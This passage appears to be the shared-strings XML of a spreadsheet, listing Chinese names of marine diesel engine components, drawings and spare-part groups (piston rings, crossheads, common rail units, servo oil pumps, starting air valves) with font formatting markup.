        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>块</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>穿壁接头</t>
  </si>
  <si>
    <t>隔离板</t>
  </si>
  <si>
    <t>部件检验表</t>
  </si>
  <si>
    <t>受控部件规程</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>孔板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>主机转速传感器</t>
  </si>
  <si>
    <t>传感器支架</t>
  </si>
  <si>
    <t>小齿轮</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管子支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式管夹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管夹</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管道连接件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路接口图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>短管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管路压力控制阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>活塞安装件</t>
  </si>
  <si>
    <t>活塞对中</t>
  </si>
  <si>
    <t>活塞对中指导</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却流量监测</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>活塞冷却油温度监测</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头滑油</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>活塞导套</t>
  </si>
  <si>
    <t>活塞头材料订货图</t>
  </si>
  <si>
    <t>活塞密封圈</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞调整装置</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞环</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>活塞杆</t>
  </si>
  <si>
    <t>活塞裙</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>塑料薄片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>走台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>杆板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台底板栏杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台支撑件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>走台外形图</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>平台支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>插头</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>堵塞</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>指针</t>
  </si>
  <si>
    <t>飞轮指针</t>
  </si>
  <si>
    <t>ID码位置</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>焊后热处理</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>功率放大器</t>
  </si>
  <si>
    <t>电源</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>无缝压力管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>十字头销防护说明</t>
  </si>
  <si>
    <t>保养说明</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力瓶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>压力控制阀</t>
  </si>
  <si>
    <t>推力垫片</t>
  </si>
  <si>
    <t>压力表板</t>
  </si>
  <si>
    <t>压力表接头</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压喷嘴</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>压力调节单元</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>减压阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>保压阀</t>
  </si>
  <si>
    <t>压力开关</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力转换管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>压力传感器</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预紧千斤顶</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>主要部件尺寸及重量</t>
  </si>
  <si>
    <t>保护帽</t>
  </si>
  <si>
    <t>防护盖</t>
  </si>
  <si>
    <t>护管</t>
  </si>
  <si>
    <t>防护层</t>
  </si>
  <si>
    <t>防护板</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护衬套</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>保护管</t>
  </si>
  <si>
    <t>接近传感器</t>
  </si>
  <si>
    <t>PTFE材料规范</t>
  </si>
  <si>
    <t>脉冲电子元件</t>
  </si>
  <si>
    <t>脉冲式气缸注油器系统参数</t>
  </si>
  <si>
    <t>脉冲式气缸注油器</t>
  </si>
  <si>
    <t>泵盖</t>
  </si>
  <si>
    <t>套筒</t>
  </si>
  <si>
    <t>柱塞</t>
  </si>
  <si>
    <t>伺服油泵</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵支架</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>质量与试验规范</t>
  </si>
  <si>
    <t>质量代码</t>
  </si>
  <si>
    <t>压力部件测试规范</t>
  </si>
  <si>
    <t>共轨单元</t>
  </si>
  <si>
    <t>共轨单元安装件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>共轨平台</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>共轨阀</t>
  </si>
  <si>
    <t>矩形空心管</t>
  </si>
  <si>
    <t>整流器</t>
  </si>
  <si>
    <t>异径接管</t>
  </si>
  <si>
    <t>异径接头</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>警告牌</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>调节杆组件</t>
  </si>
  <si>
    <t>调节套</t>
  </si>
  <si>
    <t>继电器</t>
  </si>
  <si>
    <t>防爆门</t>
  </si>
  <si>
    <t>机架防爆门</t>
  </si>
  <si>
    <t>安全阀壳体</t>
  </si>
  <si>
    <t>起动空气安全阀</t>
  </si>
  <si>
    <t>遥测温度计</t>
  </si>
  <si>
    <t>轴承盖的拆卸和安装</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头的拆卸和安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>十字头拆卸和安装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>连杆的拆卸</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖吊装</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>测量报告</t>
  </si>
  <si>
    <t>电阻</t>
  </si>
  <si>
    <t>两半管夹</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位法兰</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>喷嘴外壳</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>定位销</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>限位螺钉</t>
  </si>
  <si>
    <t>气缸润滑油回油管</t>
  </si>
  <si>
    <t>回流管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>垫圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>肋板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>环形支架</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>环</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-2</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>半式</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>杆用密封圈</t>
  </si>
  <si>
    <t>滚轮销</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚子支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>转动设备</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>转翼</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆橡胶圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶垫片</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>橡胶板</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>橡胶圈</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>试航磨合大纲</t>
  </si>
  <si>
    <t>台架试验磨合大纲</t>
  </si>
  <si>
    <t>空冷器冷却水管</t>
  </si>
  <si>
    <r>
      <t>SAM</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制系统</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>空冷器</t>
  </si>
  <si>
    <t>扫气箱</t>
  </si>
  <si>
    <t>扫气箱安装件</t>
  </si>
  <si>
    <t>扫气箱加工</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>布置图</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>刮油环订货图</t>
  </si>
  <si>
    <t>三半刮油环</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封垫</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>密封法兰</t>
  </si>
  <si>
    <t>挡片</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>底板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>支承座</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弧形板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>自粘标签</t>
  </si>
  <si>
    <t>半导体</t>
  </si>
  <si>
    <t>重要部件清单</t>
  </si>
  <si>
    <t>传感器</t>
  </si>
  <si>
    <t>伺服油脉冲支管</t>
  </si>
  <si>
    <t>伺服油泄漏管</t>
  </si>
  <si>
    <t>伺服油管</t>
  </si>
  <si>
    <t>气缸润滑油伺服油管</t>
  </si>
  <si>
    <t>伺服油服务泵</t>
  </si>
  <si>
    <t>密封条</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>轴端</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>轴颈</t>
  </si>
  <si>
    <t>应急停车组件</t>
  </si>
  <si>
    <t>试车台应急停车组件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>截止阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>主起动阀</t>
  </si>
  <si>
    <t>侧面盖</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>视流器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>消音器订货图</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>单钩</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>滑环</t>
  </si>
  <si>
    <t>集油桶</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>冲击环形扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>软件订货</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电磁浮动开关</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>噪音与热绝缘</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>绝缘层</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>备件箱</t>
  </si>
  <si>
    <t>备件</t>
  </si>
  <si>
    <t>自清滤器备件</t>
  </si>
  <si>
    <t>辅助风机开关箱备件</t>
  </si>
  <si>
    <t>气缸润滑单元备件</t>
  </si>
  <si>
    <t>滤器备件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>主机控制系统备件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>FLEX系统备件</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>备件组</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>专用法兰</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内六角扳手</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>规范和说明</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>转速控制系统</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导杆</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>喷射板</t>
  </si>
  <si>
    <t>带油管的喷射板</t>
  </si>
  <si>
    <t>弹簧座</t>
  </si>
  <si>
    <t>弹性定位销</t>
  </si>
  <si>
    <t>弹簧壳体</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧组件</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹性张紧器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>正齿轮葫芦吊</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>方钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不锈钢球阀</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>梯子</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>曲轴标记</t>
  </si>
  <si>
    <t>主机参数</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>伺服油服务泵启动器</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>起动空气管</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>起动空气系统</t>
  </si>
  <si>
    <t>启动阀总成</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>立柱</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>撑管</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>角钢</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">钢环 </t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>钢带</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>踏脚</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>加强版</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>限位衬套</t>
  </si>
  <si>
    <t>止动环</t>
  </si>
  <si>
    <t>塞子</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直通接头</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <t>斯特劳勃接头</t>
  </si>
  <si>
    <t>螺纹套管</t>
  </si>
  <si>
    <t>螺柱</t>
  </si>
  <si>
    <t>双螺纹接头</t>
  </si>
  <si>
    <t>附加材料说明</t>
  </si>
  <si>
    <t>供油单元</t>
  </si>
  <si>
    <t>供油单元装配件</t>
  </si>
  <si>
    <t>供油单元供油系统</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>支撑板</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>带油斗支撑</t>
    </r>
    <phoneticPr fontId="5" type="noConversion"/>
